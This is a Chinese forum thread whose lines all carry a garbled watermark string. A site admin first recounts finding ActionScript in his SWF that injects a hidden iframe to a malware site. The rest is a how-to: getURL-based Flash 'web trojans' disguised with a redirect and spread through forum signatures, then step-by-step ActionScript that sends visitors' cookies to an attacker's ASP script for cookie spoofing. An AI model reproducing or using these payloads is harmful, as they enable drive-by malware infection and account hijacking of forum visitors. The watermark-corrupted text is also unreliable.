这一两个月,我想如果有来我网站的人应该发现,我的网站常常挂点,其实我的server被植入木马,而针对的网站是我帮蔡依林后援会架设的网站 ,最让我惊讶的他的木马植入方式,是放在我的网页上方的flash里面,怎么放呢,他在我的swf里面多加了这一串指令... ”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
if (i == null)”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
{”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
i = 1;”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
if (_url.toLowerCase().substr(0, 4) == "http")”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
{”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
getURL("javascript:document.body.insertAdjacentHTML('beforeEnd','<iframe src=http://www.88doudou.com width=0 height=0 ></iframe>')", "_self");”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
} // end if”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
} // end if”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
return(null >>> (null | null === null));”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
而该网页里面又放了木马程序在里面,我从没想过已经有人利用swf来下手木马的攻击,真的是防不胜防,或许我不是首例,我也不知道该黑客是讨厌蔡依林还是讨厌我,不过如果我有不对的地方,也烦请直接告知,别再利用这种方式伤害其它无辜的网友....该黑客之前主要攻击日本网站为主,相关讯息如下:”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
http://whois.ansi.co.jp/?key=shtm1.com ”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
Admin Name........... pi ger ”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
Admin Address........ hidden ”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
Admin Address........ ”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
Admin Address........ Beijing ”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
Admin Address........ 123456 ”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
Admin Address........ BJ ”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
Admin Address........ CN ”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
Admin Email.......... ****jpmm@china.com ”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
Admin Phone.......... +86.1012345678 ”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
Admin Fax............ +86.1012345678 ”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|

flash网页木马制作高级技巧学过flash的人应该都知道flash动作选项里有个获取url的选项,在指定帧设定动作,指向带木马的网页,木马网页怎么制作我就不说了,不是本文介绍的范围.当播放到指定帧时,木马网页自动打开,接下来会发生什么事,大家都知道吧,呵呵.下面我来说下怎么制作这种flash.”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
新建个flash,在某一帧双击左键,跳出动作选项,填入木马网页地址,比如http://www.qqxia.com,当然,这只是假设的地址.”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
　　当flash自动播放到那帧时,网页就自动出来拉,木马就自动下载然后执行,呵呵.当然,你是高手的话,把flash做漂亮点,更具迷惑性!跳出来的网页设置也有技巧,最好在网页上有点内容,别是一片空白,那样太容易被人识破了,更绝的是,让它转到别的正常的网页.”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
<meta http-equiv="refresh" content="1;url=http://www.163.com/";>上面的代码就是让木马网页打开之后,再过1秒钟就转到163去,这样,够隐蔽吧!”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
　　最后,大家会问,这个flash放哪儿去,才会有人看呢?签名里呀!!哈哈!热门的贴去顶下,自然有人看到你的flash洛!”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
1. 首先准备好一个可以运行ASP的空间，用来存放Cookies”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
2. 新建一个Flash动画，加入如下代码：”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
onClipEvent (load) {”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
url="javascript：var rng=document．selection.createRange();rng.pasteHTML(\"<iframe name=frame_hide style='display:none'></iframe><img src=\\\"./images/logo.gif\\\" style=\\\"display:none\\\" onload=\\\"javascript：co=document．.cookie;document．all.frame_hide.src='http://存放路径/WriteCookies.asp?Cookies='+co.split('&');var e=document．all;for(var i=0;i<e.length;i++){if(e(i).tagName=='A'){var ss=e(i).outerHTML;}}\\\">\");"”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
getURL(url);”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
}”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
利用iframe是为了让其它人查觉不到程序的页面跳转”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
3. 将Flash导出****文件，插入到想要偷取Cookies的论坛上，加入代码[全屏欣赏]”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
（注，有些论坛是****][****]）”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
4. 这样，如果有用户进到贴子里面，javascript程序就会把该用户的Cookies送到WriteCookies.asp，保存到数据库”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
5. 至于Cookies欺骗，推荐使用IECookiesView，很多教程都有介绍，在这里就不多说了”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
◇ 备注”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
1. 对于禁用Flash的论坛，还可以利用PNG格式的图片嵌入代码偷取”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
2. 拿到Cookies后，密码是经MD5算法加密过的字符串，如果你喜欢用暴力的话，可以试试去解码，当然，个人是不推荐这种方法的”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|

太厉害了，学习， 小鱼老师真是厉害，:< 学习”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|

”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|

云里  雾里。。。。。。”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|
不过理解大概的意思  ASP被人给黑过”$"QåúÖ ’www.flash-bbs.comÁí}D[Šƒ¡[|